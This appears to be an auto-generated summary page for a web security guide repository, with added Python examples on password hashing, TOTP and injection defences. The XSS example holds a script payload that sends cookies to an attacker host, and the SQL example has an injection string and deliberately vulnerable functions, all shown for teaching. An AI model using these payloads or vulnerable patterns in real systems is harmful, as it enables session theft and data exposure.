explaingit

fallibleinc/security-guide-for-developers

21,088 · Audience · developer · Complexity · 1/5 · Quiet · Setup · easy

TLDR

A practical security reference guide for web developers covering authentication, encryption, common attacks, and secure coding practices.

Mindmap

mindmap
  root((repo))
    What it covers
      Authentication methods
      Input validation
      Common attacks
      Encryption basics
    Security topics
      HTTPS and transport
      OAuth2 and JWT
      Password storage
      HTTP headers
    For whom
      Beginners learning basics
      Experienced devs needing reminders
    How to use
      Security checklist
      Detailed explanations
      Real-world examples
    Tech guidance
      Python libraries
      Node.js libraries

Things people build with this

USE CASE 1

Review the security checklist before deploying a web application to catch common vulnerabilities.

USE CASE 2

Learn the difference between secure and insecure password hashing methods like bcrypt versus MD5.
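The contrast the guide draws, shown as runnable code (an added example, not code from the guide itself): an unsalted, fast MD5 digest gives every user with the same password the same stored value, so precomputed tables and fast brute force apply directly; a salted, deliberately slow hash with a tunable work factor does not. The slow hash here is the standard library's PBKDF2-HMAC-SHA256 standing in for bcrypt, because it needs no third-party package; the same structure applies to the `bcrypt` package (`bcrypt.hashpw` / `bcrypt.checkpw`). The storage format, the 600,000-iteration work factor and the sample password are assumptions of the example.

```python
import hashlib
import hmac
import os

# Constructed sample password, not from the guide.
PASSWORD = "correct horse battery staple"

# Assumed work factor; tune so that one hash costs a few hundred ms on the server.
PBKDF2_ITERATIONS = 600_000


def md5_store(password: str) -> str:
    """Insecure: unsalted and fast. Identical passwords yield identical
    digests, so a lookup table or GPU brute force recovers them cheaply."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_store(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, slow hash (stdlib stand-in for bcrypt): a fresh random salt
    per user plus a tunable cost. Stored as algorithm$iterations$salt$hash
    so the parameters travel with the record and can be raised later."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count and compare in
    constant time, so response timing does not leak matching prefixes."""
    algo, iters, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(dk.hex(), hash_hex)


def needs_rehash(stored: str, iterations: int = PBKDF2_ITERATIONS) -> bool:
    """True when the record was hashed with a lower cost than current policy;
    rehash at next successful login so old records catch up over time."""
    return int(stored.split("$")[1]) < iterations


if __name__ == "__main__":
    print("md5 (same twice):", md5_store(PASSWORD) == md5_store(PASSWORD))
    rec = pbkdf2_store(PASSWORD)
    print("pbkdf2 record:", rec[:40], "...")
    print("verify ok:", pbkdf2_verify(PASSWORD, rec))
    print("verify wrong:", pbkdf2_verify("wrong", rec))
```

`needs_rehash` is the piece most login systems forget: raising the work factor only helps if existing records are upgraded when the plaintext is next available, i.e. at a successful login.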

USE CASE 3

Understand how to implement two-factor authentication and OAuth2 in your web app.
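What the TOTP half of two-factor authentication actually computes (RFC 6238 over RFC 4226 HOTP), as an added example that is not code from the guide: HMAC-SHA1 over a 30-second time counter, dynamic truncation to a 6-digit code, and verification that tolerates one step of clock skew, compares in constant time, and refuses to accept a counter at or below the last one used so a captured code cannot be replayed within its window. The demo secret is the RFC reference secret `12345678901234567890` base32-encoded; the `window` and `last_used_counter` parameters are assumptions of this example, and persisting the returned counter per user is left to the caller.

```python
import base64
import hashlib
import hmac
import struct
import time
from typing import Optional

# Constructed demo secret: the RFC 4226 / RFC 6238 reference key, base32 as
# authenticator apps expect it in the provisioning URI.
DEMO_SECRET_B32 = base64.b32encode(b"12345678901234567890").decode()


def hotp(secret_b32: str, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1(key, counter) then dynamic truncation."""
    key = base64.b32decode(secret_b32.upper() + "=" * (-len(secret_b32) % 8))
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret_b32: str, unix_time: Optional[int] = None,
         step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with the counter derived from wall-clock time."""
    if unix_time is None:
        unix_time = int(time.time())
    return hotp(secret_b32, unix_time // step, digits)


def verify_totp(secret_b32: str, submitted: str, unix_time: Optional[int] = None,
                step: int = 30, digits: int = 6, window: int = 1,
                last_used_counter: int = -1) -> Optional[int]:
    """Return the matched counter, or None.

    Accepts the current step and +/- `window` neighbours for clock skew,
    compares in constant time, and rejects any counter <= last_used_counter
    (replay). The caller must store the returned counter for the user.
    """
    if unix_time is None:
        unix_time = int(time.time())
    current = unix_time // step
    matched = None
    # Evaluate every candidate rather than returning early, so timing does
    # not reveal which step (if any) matched.
    for c in range(current - window, current + window + 1):
        if c > last_used_counter and hmac.compare_digest(
                hotp(secret_b32, c, digits), submitted):
            matched = c
    return matched


if __name__ == "__main__":
    print("current code:", totp(DEMO_SECRET_B32))
    print("RFC 6238 T=59:", totp(DEMO_SECRET_B32, 59))
```

The user's secret must be stored server-side as carefully as a password hash would be (it is a symmetric key, not a hash); rate-limit verification attempts, since a 6-digit code with a 3-step window is guessable in a few hundred thousand tries.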

USE CASE 4

Reference attack patterns like CSRF, XSS, and SQL injection to avoid them in your code.
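Two of those patterns side by side with their fixes, as an added example that is not code from the guide: the SQL injection comes from splicing user input into a query string, and the fix is a parameterized query; the reflected XSS comes from splicing user input into HTML, and the fix is context-appropriate output encoding. The in-memory SQLite table, the usernames and the payload strings are all constructed for this example (CSRF, the third pattern named above, is a different mechanism and is not shown here).

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b")],
    )
    return conn


# --- SQL injection ---------------------------------------------------------

def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable on purpose: the input becomes part of the SQL grammar."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    return [row[0] for row in conn.execute(sql)]


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Fixed: a bound parameter is always data, never SQL, whatever it contains."""
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


# Constructed attacker input: closes the quote and appends an always-true clause.
SQLI_PAYLOAD = "x' OR '1'='1"


# --- Reflected XSS ---------------------------------------------------------

def greeting_vulnerable(name: str) -> str:
    """Vulnerable on purpose: the input is interpolated into HTML as-is."""
    return f"<p>Hello, {name}!</p>"


def greeting_safe(name: str) -> str:
    """Fixed for the HTML text context: escape <, >, &, quotes. Other contexts
    (attribute, JavaScript, URL) need their own encoding."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


# Constructed attacker input: a script tag instead of a name.
XSS_PAYLOAD = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_user_vulnerable(db, SQLI_PAYLOAD))  # every user
    print("safe:      ", find_user_safe(db, SQLI_PAYLOAD))        # nobody
    print(greeting_vulnerable(XSS_PAYLOAD))
    print(greeting_safe(XSS_PAYLOAD))
```

Template engines that auto-escape and ORMs that bind parameters give the safe form by default; the vulnerable form usually reappears when someone drops to raw strings for a "quick" query or marks a template value as safe.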

Tech stack

HTTPS · OAuth2 · JWT · bcrypt · TOTP · Python · Node.js

Getting it running

Difficulty · easy Time to first run · 5min
License could not be detected automatically. Check the repository's LICENSE file before use.

In plain English

This is a practical security guide for web developers, written as a work-in-progress reference book. It targets two kinds of developers: those just starting out who may not know the difference between insecure and secure choices (such as MD5 versus bcrypt for password hashing), and experienced developers who know the concepts but sometimes forget to apply them. The guide includes a security checklist as well as detailed explanations. The contents cover a broad range of web security topics organized into chapters: HTTPS and secure transport, authentication methods including two-factor authentication and TOTP, authorization patterns like OAuth2 and JWT, input validation and sanitization, cross-site scripting, injection attacks, encryption and hashing concepts, password policies and storage, session management, security-related HTTP headers, common server configuration mistakes, and specific attack types such as clickjacking, cross-site request forgery, denial of service, and server-side request forgery. It also includes statistics on real-world vulnerabilities, security libraries for Python and Node/JS, and guidance on maintaining good security hygiene over time.

Copy-paste prompts

Prompt 1
I'm building a login system. What does this security guide say about password hashing and two-factor authentication?
Prompt 2
Show me the security checklist from this guide and help me audit my Node.js app against it.
Prompt 3
Explain how OAuth2 (an authorization framework) and JWT (a token format) relate, and when this guide recommends each.
Prompt 4
What does this guide recommend for preventing cross-site scripting and SQL injection attacks?
Prompt 5
I need to set up HTTPS and secure HTTP headers. What does this guide recommend?

Generated 2026-05-18 · Model: sonnet-4-6 · Verify against the repo before relying on details.